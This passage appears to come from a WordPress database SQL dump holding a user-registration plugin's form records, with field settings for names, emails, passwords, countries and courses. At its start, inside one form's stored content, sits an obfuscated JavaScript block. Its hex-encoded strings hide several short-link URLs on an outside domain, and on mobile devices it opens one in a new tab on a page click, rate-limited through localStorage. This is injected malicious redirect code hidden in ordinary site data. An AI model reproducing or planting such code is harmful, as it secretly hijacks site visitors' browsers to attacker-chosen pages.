_0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Default form','','publish','closed','closed','','default-form','','','2022-11-12 14:43:26','2022-11-12 14:43:26','',0,'https://gsw2023.com/?post_type=user_registration&p=3320',0,'user_registration','',0),
(3321,1,'2022-11-12 14:46:02','2022-11-12 14:46:02','[[[]],[[{\"field_key\":\"first_name\",\"general_setting\":{\"label\":\"First Name\",\"description\":\"\",\"field_name\":\"first_name\",\"placeholder\":\"\",\"required\":\"yes\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-first-name\"},{\"field_key\":\"textarea\",\"general_setting\":{\"label\":\"Mailing Address\",\"description\":\"\",\"field_name\":\"textarea_1623050614\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-textarea\"},{\"field_key\":\"country\",\"general_setting\":{\"label\":\"Country\",\"description\":\"\",\"field_name\":\"country_1623050729\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"selected_countries\":[\"AF\",\"AX\",\"AL\",\"DZ\",\"AS\",\"AD\",\"AO\",\"AI\",\"AQ\",\"AG\",\"AR\",\"AM\",\"AW\",\"AU\",\"AT\",\"AZ\",\"BS\",\"BH\",\"BD\",\"BB\",\"BY\",\"BE\",\"PW\",\"BZ\",\"BJ\",\"BM\",\"BT\",\"BO\",\"BQ\",\"BA\",\"BW\",\"BV\",\"BR\",\"IO\",\"VG\",\"BN\",\"BG\",\"BF\",\"BI\",\"KH\",\"CM\",\"CA\",\"CV\",\"KY\",\"CF\",\"TD\",\"CL\",\"CN\",\"CX\",\"CC\",\"CO\",\"KM\",\"CG\",\"CD\",\"CK\",\"CR\",\"HR\",\"CU\",\"CW\",\"CY\",\"CZ\",\"DK\",\"DJ\",\"DM\",\"DO\",\"EC\",\"EG\",\"SV\",\"GQ\",\"ER\",\"EE\",\"ET\",\"FK\",\"FO\",\"FJ\",\"FI\",\"FR\",\"GF\",\"PF\",\"TF\",\"GA\",\"GM\",\"GE\",\"DE\",\"GH\",\"GI\",\"GR\",\"GL\",\"GD\",\"GP\",\"GU\",\"GT\",\"GG\",\"GN\",\"GW\",\"GY\",\"HT\",\"HM\",\"HN\",\"HK\",\"HU\",\"IS\",\"IN\",\"ID\",\"IR\",\"IQ\",\"IE\",\"IM\",\"IL\",\"IT\",\"CI\",\"JM\",\"JP\",\"JE\",\"JO\",\"KZ\",\"KE\",\"KI\",\"KW\",\"KG\",\"LA\",\"LV\",\"LB\",\"LS\",\"LR\",\"LY\",\"LI\",\"LT\",\"LU\",\"MO\",\"MK\",\"MG\",\"MW\",\"MY\",\"MV\",\"ML\",\"MT\",\"MH\",\"MQ\",\"MR\",\"MU\",\"YT\",\"MX\",\"FM\",\"MD\",\"MC\",\"MN\",\"ME\",\"MS\",\"MA\",\"MZ\",\"MM\",\"NA\",\"NR\",\"NP\",\"NL\",\"NC\",\"NZ\",\"NI\",\"NE\",\"NG\",\"NU\",\"NF\",\"MP\",\"KP\",\"NO\",\"OM\",\"PK\",\"PS\",\"PA\",\"PG\",\"PY\",\"PE\",\"PH\",\"PN\",\"PL\",\"PT\",\"PR\",\"QA\",\"RE\",\"RO\",\"RU\",\"RW\",\"BL\",\"SH\",\"KN\",\"LC\",\"MF\",\"SX\",\"PM\",\"VC\",\"SM\",\"ST\",\"SA\",\"SN\",\"RS\",\"SC\",\"SL\",\"SG\",\"SK\",\"SI\",\"SB\",\"SO\",\"ZA\",\"GS\",\"KR\",\"SS\",\"ES\",\"LK\",\"SD\",\"SR\",\"SJ\",\"SZ\",\"SE\",\"CH\",\"SY\",\"TW\",\"TJ\",\"TZ\",\"TH\",\"TL\",\"TG\",\"TK\",\"TO\",\"TT\",\"TN\",\"TR\",\"TM\",\"TC\",\"TV\",\"UG\",\"UA\",\"AE\",\"GB\",\"US\",\"UM\",\"VI\",\"UY\",\"UZ\",\"VU\",\"VA\",\"VE\",\"VN\",\"WF\",\"EH\",\"WS\",\"YE\",\"ZM\",\"ZW\"],\"default_value\":\"AF\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-flag\"},{\"field_key\":\"date\",\"general_setting\":{\"label\":\"Date of Birth\",\"description\":\"\",\"field_name\":\"date_box_1623051693\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"date_format\":\"Y-m-d\",\"enable_min_max\":\"false\",\"min_date\":\"\",\"max_date\":\"\",\"set_current_date\":\"\",\"enable_date_range\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-calendar\"}],[{\"field_key\":\"last_name\",\"general_setting\":{\"label\":\"Last Name\",\"description\":\"\",\"field_name\":\"last_name\",\"placeholder\":\"\",\"required\":\"yes\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-last-name\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"City\",\"description\":\"\",\"field_name\":\"input_box_1623050696\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"State\",\"description\":\"\",\"field_name\":\"input_box_1623050759\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"Zip Code\",\"description\":\"\",\"field_name\":\"input_box_1623050879\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"radio\",\"general_setting\":{\"label\":\"Gender\",\"description\":\"\",\"field_name\":\"radio_1623051748\",\"options\":[\"Male\",\"Female\",\"Other\"],\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\",\"options\":\"Male,Female,Other\"},\"icon\":\"ur-icon ur-icon-radio\"}]],[[]],[[{\"field_key\":\"user_email\",\"general_setting\":{\"label\":\"Student email address\",\"description\":\"\",\"field_name\":\"user_email\",\"placeholder\":\"\",\"required\":\"yes\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-email\"},{\"field_key\":\"user_pass\",\"general_setting\":{\"label\":\"Password\",\"description\":\"\",\"field_name\":\"user_pass\",\"placeholder\":\"\",\"required\":\"yes\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"field_visibility\":\"both\"},\"icon\":\"ur-icon ur-icon-password\"}],[{\"field_key\":\"user_confirm_email\",\"general_setting\":{\"label\":\"Confirm student email address\",\"description\":\"\",\"field_name\":\"user_confirm_email\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"field_visibility\":\"both\"},\"icon\":\"ur-icon ur-icon-email-confirm\"},{\"field_key\":\"user_confirm_password\",\"general_setting\":{\"label\":\"Confirm Password\",\"description\":\"\",\"field_name\":\"user_confirm_password\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"field_visibility\":\"both\"},\"icon\":\"ur-icon ur-icon-password-confirm\"}]],[[]],[[{\"field_key\":\"select\",\"general_setting\":{\"label\":\"Course\",\"description\":\"\",\"field_name\":\"select_1623053939\",\"options\":[\"SLC\",\"Plus 2\",\"Bachelor\",\"Master\",\"Diploma\"],\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\",\"options\":\"SLC,Plus 2,Bachelor,Master,Diploma\"},\"icon\":\"ur-icon ur-icon-drop-down\"},{\"field_key\":\"select\",\"general_setting\":{\"label\":\"Course\",\"description\":\"\",\"field_name\":\"select_1623075235990\",\"options\":[\"SLC\",\"Plus 2\",\"Bachelor\",\"Master\",\"Diploma\"],\"default_value\":\"Plus 2\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"yes\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\",\"options\":\"SLC,Plus 2,Bachelor,Master,Diploma\"},\"icon\":\"ur-icon ur-icon-drop-down\"},{\"field_key\":\"select\",\"general_setting\":{\"label\":\"Course\",\"description\":\"\",\"field_name\":\"select_1623075252220\",\"options\":[\"SLC\",\"Plus 2\",\"Bachelor\",\"Master\",\"Diploma\"],\"default_value\":\"Bachelor\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"yes\"},\"advance_setting\":{\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\",\"options\":\"SLC,Plus 2,Bachelor,Master,Diploma\"},\"icon\":\"ur-icon ur-icon-drop-down\"}],[{\"field_key\":\"text\",\"general_setting\":{\"label\":\"School/University\",\"description\":\"\",\"field_name\":\"input_box_1623075201\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"no\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon ur-icon-input-field\"},{\"field_key\":\"text\",\"general_setting\":{\"label\":\"School/University\",\"description\":\"\",\"field_name\":\"input_box_1623075238301\",\"placeholder\":\"\",\"required\":\"no\",\"hide_label\":\"yes\"},\"advance_setting\":{\"size\":\"20\",\"default_value\":\"\",\"custom_class\":\"\",\"enable_prepopulate\":\"false\",\"parameter_name\":\"\",\"enable_conditional_logic\":\"\",\"cl_map\":\"{\\\"action\\\":\\\"show\\\",\\\"logic_map\\\":{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"OR\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"group\\\",\\\"logic_gate\\\":\\\"\\\",\\\"conditions\\\":[{\\\"type\\\":\\\"field\\\",\\\"triggerer_id\\\":\\\"\\\",\\\"operator\\\":\\\"is\\\",\\\"value\\\":\\\"\\\"}]}]}}\",\"field_visibility\":\"both\",\"read_only\":\"none\"},\"icon\":\"ur-icon 